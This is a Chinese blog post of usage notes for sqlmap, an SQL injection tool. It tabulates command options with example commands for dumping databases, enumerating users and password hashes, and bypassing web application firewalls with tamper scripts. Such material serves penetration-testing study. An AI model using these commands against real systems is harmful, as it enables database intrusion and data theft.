【Web安全】sqlmap的使用笔记及示例

sqlmap的使用笔记

文章目录

sqlmap的使用笔记

1. 目标

操作	作用	必要示例
-u	指定URL，检测注入点	`sqlmap -u 'http://example.com/?id=1'`
-m	指定txt，里面有很多个URL	`sqlmap -m urls.txt`
-r	检测POST请求的注入点，使用BP等工具抓包，将http请求内容保存到txt文件中	`sqlmap -r request.txt`
–cookie	指定cookie的值，单/双引号包裹	`sqlmap -u "http://example.com?id=x" --cookie 'session_id=1234'`
-D	指定数据库	`sqlmap -u 'http://example.com/?id=1' -D mydatabase`
-T	指定表	`sqlmap -u 'http://example.com/?id=1' -D mydatabase -T mytable`
-C	指定字段	`sqlmap -u 'http://example.com/?id=1' -D mydatabase -T mytable -C mycolumn`

2. 脱库

操作作用必要示例

-b 获取数据库版本 sqlmap -u -b

–current-db 当前数据库 sqlmap -u --current-db

–dbs 获取数据库 sqlmap -u --dbs

–tables 获取表 sqlmap -u --tables -D

–columns

获取字段

sqlmap -u  --columns -D  -T –schema 字段类型 sqlmap -u  --schema -D 
–dump 获取数据 sqlmap -u  --dump -D  -T –start 开始的行 sqlmap -u  --start=1 -D  -T –stop 结束的行 sqlmap -u  --stop=10 -D  -T –search 搜索库表字段 sqlmap -u  --search -C 
–tamper WAF绕过 sqlmap -u  --tamper= 
2.1. 脱库（补充） 
–current-db获取的是当前的数据库名称，而–dbs获取的是所有的数据库名称
WAF 指的是“Web Application Firewall”，即网络应用防火墙，例如sqlmap -u ‘http://xx/?id=1’ --tamper ‘space2comment.py’，sqlmap有很多内置的绕过脚本(脚本按照用途命名)，在/usr/share/sqlmap/tamper/目录下
–search：如果你正在寻找包含特定关键字的列，这个命令将列出所有包含该关键字的列的名称及其所属的表和数据库。 
3. 其他 
操作 作用 必要示例
–batch 不再询问确认 sqlmap -u 'http://example.com/?id=1' --batch
–method=GET 指定请求方式 sqlmap -u 'http://example.com/?id=1' --method=GET
–random-agent 随机UA sqlmap -u 'http://example.com/?id=1' --random-agent
–user-agent 自定义UA sqlmap -u 'http://example.com/?id=1' --user-agent 'MyUserAgent'
–referer 自定义referer sqlmap -u 'http://example.com/?id=1' --referer 'http://referer.com'
–proxy=“123” 代理 sqlmap -u 'http://example.com/?id=1' --proxy='http://123.123.123.123:8080'
–threads 10 线程数1~10 sqlmap -u 'http://example.com/?id=1' --threads 10
–level=1 测试等级1~5 sqlmap -u 'http://example.com/?id=1' --level=1
–risk=1 风险等级0~3 sqlmap -u 'http://example.com/?id=1' --risk=1 
3.1. 其他（补充） 
测试等级：这个等级决定了 SQLMap 将尝试的测试数量和类型。较高的等级意味着 SQLMap 将执行更多类型的测试，这些测试可能更复杂，有时也更具侵入性。例如，在较低的等级上，SQLMap 可能只测试最常见的注入类型，而在较高等级上，它会尝试更多不常见的或复杂的注入技术。
风险等级：风险等级影响测试的侵入性。较高的风险等级可能会运行更具侵入性的测试，这些测试可能会对数据库造成更大的负担或风险。例如，一些高风险测试可能包括执行实际的数据库操作（如更新或删除数据），而低风险测试则尽量避免这种潜在的破坏性操作。 
操作 作用 必要示例
-a 自动识别和测试所有参数 sqlmap -u 'http://example.com/?id=1' -a
–current-user 获取当前数据库用户 sqlmap -u 'http://example.com/?id=1' --current-user
–is-dbs 检测可能的数据库 sqlmap -u 'http://example.com/?id=1' --is-dbs
–users 枚举数据库服务器上的用户 sqlmap -u 'http://example.com/?id=1' --users
–privileges 枚举数据库用户的权限 sqlmap -u 'http://example.com/?id=1' --privileges
–passwords 尝试获取数据库用户的密码 sqlmap -u 'http://example.com/?id=1' --passwords
–hostname 获取数据库服务器的主机名 sqlmap -u 'http://example.com/?id=1' --hostname
–statements 捕获并显示SQL语句 sqlmap -u 'http://example.com/?id=1' --statements
                
                    
                

                

                    相关阅读:

                    
maven-mvnd使用步骤，新版Maven，构建速度大幅提升                            

数据库——创建和管理表                            

建成 5000 多间「梦想中心」后，他们决定将技术开源                            

react受控组件与非受控组件                            

Centos7使用Nginx配置HTTPS正向代理                            

FlatBuffers 转换数据字节为JSON字符串的格式。                            

从Matlab实例学习差分进化算法                            

物联网设备安全性：构建可信任的智能生态系统                            

云计算 - 1 - 三虚拟机Hadoop的安装和配置                            

VScode搭建C/C++编译环境                            

                    
                
                
                    原文地址：https://blog.csdn.net/likinguuu/article/details/134542242
                

            
        

        
            
                
                    最新文章
                
                
                    
攻防演习之三天拿下官网站群                            

数据安全治理学习——前期安全规划和安全管理体系建设                            

企业安全 | 企业内一次钓鱼演练准备过程                            

内网渗透测试 | Kerberos协议及其部分攻击手法                            

0day的产生 | 不懂代码的"代码审计"                            

安装scrcpy-client模块av模块异常，环境问题解决方案                            

leetcode hot100【LeetCode 279. 完全平方数】java实现                            

OpenWrt下安装Mosquitto                            

AnatoMask论文汇总                            

【AI日记】24.11.01 LangChain、openai api和github copilot                            

                    
                
            

            
                
                    热门文章
                
                
                    
十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧！！！                            

奉劝各位学弟学妹们，该打造你的技术影响力了！                            

五年了，我在 CSDN 的两个一百万。                            

Java俄罗斯方块，老程序员花了一个周末，连接中学年代！                            

面试官都震惊，你这网络基础可以啊！                            

你真的会用百度吗？我不信 — 那些不为人知的搜索引擎语法                            

心情不好的时候，用 Python 画棵樱花树送给自己吧                            

通宵一晚做出来的一款类似CS的第一人称射击游戏Demo！原来做游戏也不是很难，连憨憨学妹都学会了！                            

13 万字 C 语言从入门到精通保姆级教程2021 年版                            

10行代码集2000张美女图，Python爬虫120例，再上征途                            

                    
                
            

        
    




    
    
    
    

    
        
            
                
                    Copyright © 2022 侵权请联系2656653265@qq.com   
                    京ICP备2022015340号-1
                
                
                    正则表达式工具
                    cron表达式工具
                    密码生成工具
                
                
                    
                    京公网安备 11010502049817号